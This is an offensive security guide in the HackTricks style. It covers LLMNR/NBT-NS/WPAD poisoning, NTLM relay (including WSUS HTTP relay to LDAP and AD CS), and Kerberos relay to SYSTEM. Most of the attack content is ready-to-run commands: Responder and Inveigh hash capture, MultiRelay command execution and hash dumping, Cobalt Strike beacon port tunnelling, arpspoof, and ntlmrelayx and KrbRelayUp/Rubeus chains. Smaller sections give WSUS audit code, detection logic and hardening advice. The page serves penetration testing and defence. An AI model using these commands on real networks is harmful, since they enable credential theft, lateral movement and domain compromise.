Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
Tip
Learn and practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Network Protocols
Local Host Name Resolution Protocols
- LLMNR, NBT-NS, and mDNS:
- Microsoft and other operating systems use LLMNR and NBT-NS for local name resolution when DNS fails. Similarly, Apple and Linux systems use mDNS.
- These protocols are susceptible to interception and spoofing because they are unauthenticated and broadcast over UDP.
- Responder and Dementor can be used to impersonate services by sending forged responses to hosts that query via these protocols.
- Further information on service impersonation using Responder can be found here.
Web Proxy Auto-Discovery Protocol (WPAD)
- WPAD allows browsers to discover proxy settings automatically.
- Discovery is done via DHCP, DNS, or by falling back to LLMNR and NBT-NS if DNS fails.
- Responder can automate WPAD attacks, directing clients to malicious WPAD servers.
Responder/Dementor for Protocol Poisoning
- Responder is a tool used for poisoning LLMNR, NBT-NS, and mDNS queries, answering selectively based on query type and primarily targeting SMB services.
- It comes pre-installed in Kali Linux and is configurable at /etc/responder/Responder.conf.
- Responder displays captured hashes on screen and saves them in the /usr/share/responder/logs directory.
- It supports both IPv4 and IPv6.
- A Windows version of Responder is available here.
- Dementor builds further on multicast poisoning and also acts as a rogue service provider (including CUPS RCE support).
- Its layout is broadly the same as Responder's, with more detailed configuration (the default is here: Dementor.toml).
- Compatibility between Dementor and Responder is given here: Compatibility Matrix
- Intro and documentation here: Dementor - Docs
- It fixes capture problems that Responder has on some protocols.
Running Responder
- To run Responder with default settings:
responder -I <Interface>
- For more aggressive probing (with potential side effects):
responder -I <Interface> -P -r -v
- Techniques to capture NTLMv1 challenges/responses for easier cracking:
responder -I <Interface> --lm --disable-ess
- WPAD impersonation can be activated with:
responder -I <Interface> --wpad
- NetBIOS requests can be resolved to the attacker's IP, and an authentication proxy can be set up:
responder.py -I <interface> -Pv
Running Dementor
- With default settings applied:
Dementor -I <interface>
- With default settings in analysis mode:
Dementor -I <interface> -A
- Automatic NTLM session downgrade (ESS):
Dementor -I <interface> -O NTLM.ExtendedSessionSecurity=Off
- Run the current session with a custom config:
Dementor -I <interface> --config <file.toml>
DHCP Poisoning with Responder
- Spoofing DHCP responses can permanently poison a victim's routing information, offering a stealthier alternative to ARP poisoning.
- It requires precise knowledge of the target network's configuration.
- Running the attack:
./Responder.py -I eth0 -Pdv
- This method can effectively capture NTLMv1/2 hashes, but it needs careful handling to avoid disrupting network functionality.
Capturing Credentials with Responder/Dementor
- Responder/Dementor impersonates services using the protocols mentioned above, capturing credentials (usually an NTLMv2 Challenge/Response) when a user tries to authenticate against the spoofed services.
- Attempts can be made to downgrade to NetNTLMv1 or to disable ESS so that cracking the credentials is easier.
If you already have a writable SMB share that victims browse, you can coerce outbound SMB without spoofing by planting UNC-based lure files (SCF/LNK/library-ms/desktop.ini/Office) generated with ntlm_theft, then catching the authentication with Responder. See the Explorer-triggered UNC lure workflow.
It is important to note that these techniques should be employed legally and ethically, ensuring proper authorization and avoiding disruption or unauthorized access.
Inveigh
Inveigh is a tool for penetration testers and red teamers, designed for Windows systems. It offers functionality similar to Responder, performing spoofing and man-in-the-middle attacks. The tool has evolved from a PowerShell script into a C# binary, with Inveigh and InveighZero as the main versions. Detailed parameters and instructions can be found on the wiki.
Inveigh can be run via PowerShell:
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
Or executed as a C# binary:
Inveigh.exe
NTLM Relay Attack
This attack leverages SMB authentication sessions to access a target machine, granting a system shell if successful. Key prerequisites are:
- The authenticating user must have Local Admin access on the relayed host.
- SMB signing must be disabled.
445 Port Forwarding and Tunneling
In scenarios where direct introduction into the network is not possible, traffic on port 445 needs to be forwarded and tunneled. Tools like PortBender help redirect port 445 traffic to another port, which matters where local admin access is available for driver loading.
PortBender setup and operation in Cobalt Strike:
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080
# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop
Other NTLM Relay Attack tools
- Metasploit: Set up with proxies, along with local and remote host details.
- smbrelayx: A Python script for relaying SMB sessions, executing commands or deploying backdoors.
- MultiRelay: A tool from the Responder suite to relay specific users or all users, execute commands, or dump hashes.
Each tool can be configured to operate through a SOCKS proxy if necessary, enabling attacks even with indirect network access.
Running MultiRelay
MultiRelay is executed from the /usr/share/responder/tools directory, targeting specific IPs or users.
python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
# Proxychains for routing traffic
RelayKing – discovering relayable targets and curated relay lists
RelayKing is an NTLM relay exposure auditor that maps where relays can work and generates ready-to-use target lists for ntlmrelayx.py -tf. It checks protocol hardening (SMB signing/channel binding; HTTP/HTTPS/MSSQL/LDAP/LDAPS EPA/CBT; RPC auth) and surfaces coercion/reflection helpers (PetitPotam/PrinterBug/DFSCoerce, WebClient/WebDAV, NTLMv1, CVE-2025-33073 reflection).
- Authentication adds confidence to the HTTPS/LDAPS CBT and MSSQL EPA checks; the SMB signing/signature level is checked without authentication.
- Cross-protocol relay pathing uses validated Net-NTLMv1 results (--ntlmv1/--ntlmv1-all); a severity rating is given per path.
- --gen-relay-list <file> writes a grep-friendly target list for ntlmrelayx.py -tf <file> to avoid trial and error.
- --coerce-all mass-triggers PetitPotam/DFSCoerce/PrinterBug against all targets; --ntlmv1-all (RemoteRegistry) and --audit (domain-wide LDAP host pull) are noisy and generate many logons/remote accesses.
- --proto-portscan speeds up scanning by skipping closed ports; --krb-dc-only helps when DCs block NTLM but other services still accept it.
Example sweeps:
# Authenticated audit across multiple protocols + generate relay list for ntlmrelayx
python3 relayking.py -u lowpriv -p 'P@ssw0rd!' -d lab.local --dc-ip 10.0.0.10 \
--audit --protocols smb,ldap,ldaps,mssql,http,https --proto-portscan --ntlmv1 \
--threads 10 -vv -o plaintext,json --output-file relayking-scan --gen-relay-list relaytargets.txt
# Unauthenticated CIDR sweep for SMB/LDAP/HTTP relayability
python3 relayking.py --null-auth --protocols smb,ldap,http --proto-portscan -o plaintext 10.10.0.0/24
Together, these tools and techniques form a complete toolkit for carrying out NTLM Relay attacks across different network environments.
Abusing WSUS HTTP (8530) for NTLM Relay to LDAP/SMB/AD CS (ESC8)
WSUS clients authenticate to their update server using NTLM over HTTP (8530) or HTTPS (8531). When HTTP is enabled, the periodic client check-ins can be coerced or intercepted on the local segment and relayed with ntlmrelayx to LDAP/LDAPS/SMB or AD CS HTTP endpoints (ESC8) without cracking any hashes. This blends in with normal update traffic and often yields machine-account (HOST$) authentication.
What to look for
- GPO/registry configuration under HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate and …\WindowsUpdate\AU:
- WUServer (e.g., http://wsus.domain.local:8530)
- WUStatusServer (reporting URL)
- UseWUServer (1 = WSUS; 0 = Microsoft Update)
- DetectionFrequencyEnabled and DetectionFrequency (hours)
- WSUS SOAP endpoints used by clients over HTTP:
- /ClientWebService/client.asmx (approvals)
- /ReportingWebService/reportingwebservice.asmx (status)
- Default ports: 8530/tcp HTTP, 8531/tcp HTTPS
Reconnaissance
- Unauthenticated
- Scan for listeners: nmap -sSVC -Pn --open -p 8530,8531 -iL <targets_file>
- Sniff HTTP WSUS traffic via L2 MITM and log active clients/endpoints with wsusniff.py (HTTP only unless you can make clients trust your TLS cert).
- Authenticated
- Parse SYSVOL GPOs for WSUS keys with MANSPIDER + regpol (wsuspider.sh wrapper summarises WUServer/WUStatusServer/UseWUServer).
- Query endpoints at scale from hosts (NetExec) or locally:
nxc smb <targets> -u <user> -p <password> -M reg-query -o PATH="HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" KEY="WUServer"
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate
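To turn the registry check above into a repeatable audit of the HTTP exposure this section describes, the following Python (an added example, not part of the page or of NetExec/WSUScripts) parses the text that `reg query` prints for the WindowsUpdate and AU keys and rates the client configuration. The sample output is constructed; the value names are the ones listed under "What to look for".

```python
# Audit a client's WSUS policy for the plaintext-HTTP (8530) NTLM relay exposure.
# Input is the text printed by:
#   reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate
#   reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
import re
from urllib.parse import urlsplit

# Constructed sample of `reg query` output for an at-risk client.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
    WUServer    REG_SZ    http://wsus.domain.local:8530
    WUStatusServer    REG_SZ    http://wsus.domain.local:8530
    DetectionFrequencyEnabled    REG_DWORD    0x1
    DetectionFrequency    REG_DWORD    0x4

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
    UseWUServer    REG_DWORD    0x1
"""

# Value lines are indented: <name> <type> <data>; key lines start in column 0.
_VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_SZ|REG_DWORD)\s+(.+?)\s*$", re.M)

def parse_reg_query(text: str) -> dict:
    """Flatten value lines into {name: str|int}; reg prints DWORDs as hex."""
    values = {}
    for name, rtype, raw in _VALUE_RE.findall(text):
        values[name] = int(raw, 16) if rtype == "REG_DWORD" else raw
    return values

def assess_wsus(values: dict) -> dict:
    """Rate relay exposure: HTTP WSUS means the client's NTLM (HOST$)
    authentication crosses the wire outside TLS and can be relayed."""
    if values.get("UseWUServer") != 1:
        return {"risk": "none", "reason": "UseWUServer != 1: clients use Microsoft Update"}
    findings = []
    for key in ("WUServer", "WUStatusServer"):
        url = values.get(key)
        if not url:
            continue
        parts = urlsplit(url)
        port = parts.port or (8531 if parts.scheme == "https" else 8530)
        if parts.scheme == "http":
            findings.append(f"{key} uses plaintext HTTP ({parts.hostname}:{port})")
    if findings:
        return {"risk": "high", "reason": "; ".join(findings),
                "fix": "Serve WSUS over HTTPS (8531) with a cert clients trust "
                       "and point WUServer/WUStatusServer at the https:// URL"}
    return {"risk": "low", "reason": "WSUS URLs are HTTPS; NTLM travels inside TLS"}
```

Feed it the combined output of both `reg query` commands (or the PATH/KEY values NetExec returns per host) and act on every "high" result.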
End-to-end HTTP relay steps
- Position for MITM (same L2) so a client resolves the WSUS server to you (ARP/DNS poisoning, Bettercap, mitm6, etc.). Example with arpspoof:
arpspoof -i <interface> -t <wsus_client_ip> <wsus_server_ip>
- Redirect port 8530 to your relay listener (optional, convenient):
iptables -t nat -A PREROUTING -p tcp --dport 8530 -j REDIRECT --to-ports 8530
iptables -t nat -L PREROUTING --line-numbers
- Start ntlmrelayx with the HTTP listener (requires Impacket support for the HTTP listener; see the PRs below):
ntlmrelayx.py -t ldap://<dc_fqdn> -smb2support -socks --keep-relaying --http-port 8530
Other common targets:
- Relay to SMB (if signing is off) for exec/dump: -t smb://<target>
- Relay to LDAPS for directory changes (e.g., RBCD): -t ldaps://<dc_fqdn>
- Relay to AD CS web enrollment (ESC8) to mint a cert and then authenticate via Schannel/PKINIT:
ntlmrelayx.py --http-port 8530 -t http://<ca_host>/certsrv/certfnsh.asp --adcs --no-http-server
For deeper AD CS abuse paths and tooling, see the AD CS page.
- Trigger a client check-in or wait for the schedule. From a client: wuauclt.exe /detectnow, or use the Windows Update UI (Check for updates).
- Use the authenticated SOCKS sessions (if -socks) or the direct relay results for post-exploitation (LDAP changes, SMB ops, or AD CS certificate issuance for later authentication).
HTTPS constraint (8531)
- Passive interception of WSUS over HTTPS is ineffective unless clients trust your certificate. Without a trusted cert or other TLS break, the NTLM handshake can’t be harvested/relayed from WSUS HTTPS traffic.
Notes
- WSUS was announced deprecated but remains widely deployed; HTTP (8530) is still common in many environments.
- Useful helpers: wsusniff.py (observe HTTP WSUS check-ins), wsuspider.sh (enumerate WUServer/WUStatusServer from GPOs), NetExec reg-query at scale.
- Impacket restored HTTP listener support for ntlmrelayx in PR #2034 (originally added in PR #913).
Force NTLM Logins
On Windows you may be able to force some privileged accounts to authenticate to arbitrary machines. Read the following page to learn how:
Force NTLM Privileged Authentication
Kerberos Relay attack
A Kerberos relay attack steals an AP-REQ ticket from one service and re-uses it against a second service that shares the same computer-account key (because both SPNs sit on the same $ machine account). This works even though the SPNs’ service classes differ (e.g. CIFS/ → LDAP/) because the key that decrypts the ticket is the machine’s NT hash, not the SPN string itself and the SPN string is not part of the signature.
Unlike NTLM relay, the hop is limited to the same host but, if you target a protocol that lets you write to LDAP, you can chain into Resource-Based Constrained Delegation (RBCD) or AD CS enrollment and pop NT AUTHORITY\SYSTEM in a single shot.
For detailed info about this attack check:
- https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html
- https://decoder.cloud/2025/04/24/from-ntlm-relay-to-kerberos-relay-everything-you-need-to-know/
Kerberos basics
| Token | Purpose | Relay relevance |
|---|---|---|
| TGT / AS-REQ ↔ REP | Proves the user to the KDC | unchanged |
| Service ticket / TGS-REQ ↔ REP | Bound to one SPN; encrypted with the SPN owner’s key | interchangeable if SPNs share account |
| AP-REQ | Client sends TGS to the service | what we steal & replay |
- Tickets are encrypted with the password-derived key of the account that owns the SPN.
- The Authenticator inside the AP-REQ has a 5-minute timestamp; replay inside that window is valid until the service cache sees a duplicate.
- Windows rarely checks whether the SPN string in the ticket matches the service you hit, so a ticket for CIFS/HOST normally decrypts fine on LDAP/HOST.
What must be true to relay Kerberos
- Shared key: source and target SPNs belong to the same computer account (default on Windows servers).
- No channel protection: SMB/LDAP signing off and EPA off for HTTP/LDAPS.
- You can intercept or coerce authentication: LLMNR/NBNS poison, DNS spoof, PetitPotam / DFSCoerce RPC, fake AuthIP, rogue DCOM, etc.
- Ticket source not already used: you win the race before the real packet hits or block it entirely; otherwise the server's replay cache fires Event 4649.
- You need some way to perform a MitM on the communication, for example by being in the DnsAdmins group so you can modify the domain's DNS, or by being able to change the victim's HOSTS file.
Kerberos Relay Steps
- 3.1 Recon the host
# find servers where HTTP, LDAP or CIFS share the same machine account
Get-ADComputer -Filter * -Properties servicePrincipalName |
Where-Object {$_.servicePrincipalName -match '(HTTP|LDAP|CIFS)'} |
Select Name,servicePrincipalName
- 3.2 Start the relay listener
# one-click local SYSTEM via RBCD
.\KrbRelayUp.exe relay --spn "ldap/DC01.lab.local" --method rbcd --clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8
KrbRelayUp wraps KrbRelay → LDAP → RBCD → Rubeus → SCM bypass in a single binary.
- 3.3 Coerce Kerberos auth
# coerce DC to auth over SMB with DFSCoerce
.\dfscoerce.exe --target \\DC01.lab.local --listener 10.0.0.50
DFSCoerce makes the DC send us a Kerberos ticket for CIFS/DC01.
- 3.4 Relay the AP-REQ
KrbRelay extracts the GSS blob from SMB, repackages it inside an LDAP bind, and forwards it to ldap://DC01; the authentication succeeds because the same key unlocks it.
- 3.5 Abuse LDAP ➜ RBCD ➜ SYSTEM
# (auto inside KrbRelayUp) manual for clarity
New-MachineAccount -Name "FAKE01" -Password "P@ss123"
KrbRelay.exe -spn ldap/DC01 -rbcd FAKE01_SID
Rubeus s4u /user:FAKE01$ /rc4:<hash> /impersonateuser:administrator /msdsspn:HOST/DC01 /ptt
SCMUACBypass.exe
You now own NT AUTHORITY\SYSTEM.
Other useful paths to know
| Path | Technique | Why it matters |
|---|---|---|
| AuthIP / IPSec | Fake server sends a GSS-ID payload with any SPN; client builds an AP-REQ straight to you | Works even across subnets; machine creds by default |
| DCOM / MSRPC | Malicious OXID resolver forces client to auth to arbitrary SPN and port | Pure local priv-esc; sidesteps firewall |
| AD CS Web Enroll | Relay machine ticket to HTTP/CA and get a cert, then PKINIT to mint TGTs | Bypasses LDAP signing defenses |
| Shadow Credentials | Write msDS-KeyCredentialLink, then PKINIT with forged key pair | No need to add a computer account |
Troubleshooting
| Error | Meaning | Fix |
|---|---|---|
| KRB_AP_ERR_MODIFIED | Ticket key ≠ target key | Wrong host/SPN |
| KRB_AP_ERR_SKEW | Clock > 5 min offset | Fix the time or use w32tm |
| LDAP bind fails | Signing enforced | Use the AD CS path or disable signing |
| Event 4649 spam | Service saw a duplicate Authenticator | Block the original packet or win the race against it |
Detection
- A spike in Event 4769 for CIFS/, HTTP/, LDAP/ from the same source within seconds.
- Event 4649 on the service indicates a detected replay.
- A Kerberos logon from 127.0.0.1 (relay to the local SCM) is highly suspicious; map it with the Sigma rule in the KrbRelayUp documentation.
- Watch for changes to the msDS-AllowedToActOnBehalfOfOtherIdentity or msDS-KeyCredentialLink attributes.
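The first two indicators above, as detection logic over a constructed batch of simplified 4769/4649 records (an added example, not from the page or the KrbRelayUp project): it flags a client that pulls service tickets for two or more of CIFS/, HTTP/ and LDAP/ on the same host inside a short window, and lists every 4649 replay event. The record layout, window and threshold are assumptions to adapt to your SIEM's field names.

```python
"""Kerberos relay indicators: 4769 bursts across service classes of one host
from one client, plus 4649 replay-detected events. Events are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, simplified event records: (EventID, time, client IP, SPN).
SAMPLE_EVENTS = [
    (4769, "2024-05-01T10:00:00", "10.0.0.50", "CIFS/DC01.lab.local"),
    (4769, "2024-05-01T10:00:01", "10.0.0.50", "LDAP/DC01.lab.local"),
    (4769, "2024-05-01T10:00:03", "10.0.0.50", "HTTP/DC01.lab.local"),
    (4769, "2024-05-01T10:00:02", "10.0.0.77", "CIFS/FS01.lab.local"),
    (4769, "2024-05-01T10:09:00", "10.0.0.77", "LDAP/FS01.lab.local"),
    (4649, "2024-05-01T10:00:04", "10.0.0.50", "LDAP/DC01.lab.local"),
]
WATCHED = ("CIFS/", "HTTP/", "LDAP/")   # service classes that share the host key

def relay_candidates(events, window_s=10, min_classes=2):
    """Group 4769s by (client, target host); alert when >= min_classes distinct
    watched service classes are requested within window_s seconds."""
    by_key = defaultdict(list)
    for eid, ts, client, spn in events:
        if eid != 4769 or not spn.upper().startswith(WATCHED):
            continue
        svc, host = spn.split("/", 1)
        by_key[(client, host.lower())].append((datetime.fromisoformat(ts), svc.upper()))
    alerts = []
    for (client, host), reqs in by_key.items():
        reqs.sort()                       # sliding window over time-ordered requests
        for i, (t0, _) in enumerate(reqs):
            classes = {svc for t, svc in reqs[i:] if t - t0 <= timedelta(seconds=window_s)}
            if len(classes) >= min_classes:
                alerts.append((client, host, tuple(sorted(classes))))
                break                     # one alert per client/host pair
    return alerts

def replay_detected(events):
    """Event 4649: the service's replay cache saw a duplicate Authenticator."""
    return [(client, spn) for eid, _, client, spn in events if eid == 4649]
```

Tune window_s to the 5-minute Authenticator lifetime at most; a legitimate client rarely needs CIFS, LDAP and HTTP tickets for one server within seconds.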
Hardening
- Enforce LDAP & SMB signing + EPA on every server.
- Split SPNs so HTTP isn’t on the same account as CIFS/LDAP.
- Patch coercion vectors (PetitPotam KB5005413, DFS, AuthIP).
- Set ms-DS-MachineAccountQuota = 0 to stop rogue computer joins.
- Alert on Event 4649 and unexpected loopback Kerberos logons.
References
- HTB: Breach – Writable SMB share lures + Responder capture → NetNTLMv2 crack
- https://intrinium.com/smb-relay-attack-tutorial/
- https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/
- https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
- https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
- WSUS Is SUS: NTLM Relay Attacks in Plain Sight (TrustedSec)
- GoSecure – Abusing WSUS to enable NTLM relaying attacks
- Impacket PR #2034 – Restore HTTP server in ntlmrelayx
- Impacket PR #913 – HTTP relay support
- WSUScripts – wsusniff.py
- WSUScripts – wsuspider.sh
- MS-WSUSOD – Windows Server Update Services: Server-to-Client Protocol
- Microsoft – WSUS deprecation announcement
- RelayKing v1.0
- Depth Security – Introducing RelayKing: Relay to Royalty